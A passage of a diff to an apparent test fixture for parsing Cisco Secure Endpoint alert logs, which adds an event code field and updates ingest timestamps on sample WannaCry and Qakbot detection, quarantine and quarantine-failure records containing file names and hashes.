                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":210000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741858\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419214500913742000",
@@ -2686,8 +2718,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513720786Z",
+                "ingested": "2021-09-30T00:15:28.103780658Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":194000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741855\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419214500913742000",
@@ -2779,8 +2812,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513722504Z",
+                "ingested": "2021-09-30T00:15:28.103782670Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419214500913742000",
@@ -2864,8 +2898,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513724362Z",
+                "ingested": "2021-09-30T00:15:28.103784832Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419214500913742000",
@@ -2937,8 +2972,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513726136Z",
+                "ingested": "2021-09-30T00:15:28.103786853Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419214500913742000",
@@ -3008,8 +3044,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513727878Z",
+                "ingested": "2021-09-30T00:15:28.103788884Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419214492323807000",
@@ -3104,8 +3141,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513729613Z",
+                "ingested": "2021-09-30T00:15:28.103790885Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419214488028840000",
@@ -3181,8 +3219,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:13.513731351Z",
+                "ingested": "2021-09-30T00:15:28.103792900Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1107296257",
                 "kind": "alert",
                 "start": "2021-01-14T13:29:36.000Z",
                 "action": "Potential Dropper Infection",
@@ -3245,11 +3284,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:42:13.513733086Z",
+                "ingested": "2021-09-30T00:15:28.103794895Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6412574627503014000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6412574627503014000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -3308,8 +3348,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513734850Z",
+                "ingested": "2021-09-30T00:15:28.103796929Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419204910251770000",
@@ -3395,8 +3436,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513736591Z",
+                "ingested": "2021-09-30T00:15:28.103798946Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769885\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419204910251770000",
@@ -3480,8 +3522,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513738332Z",
+                "ingested": "2021-09-30T00:15:28.103800964Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":34000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419204910251770000",
@@ -3553,8 +3596,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513740071Z",
+                "ingested": "2021-09-30T00:15:28.103810465Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802584\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419204905956803000",
@@ -3628,8 +3672,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513741811Z",
+                "ingested": "2021-09-30T00:15:28.103812823Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802583\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419204905956803000",
@@ -3703,8 +3748,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513743552Z",
+                "ingested": "2021-09-30T00:15:28.103814854Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802582\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419204905956803000",
@@ -3778,8 +3824,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513745300Z",
+                "ingested": "2021-09-30T00:15:28.103817060Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204905956802581\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419204905956803000",
@@ -3853,8 +3900,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513747019Z",
+                "ingested": "2021-09-30T00:15:28.103819277Z",
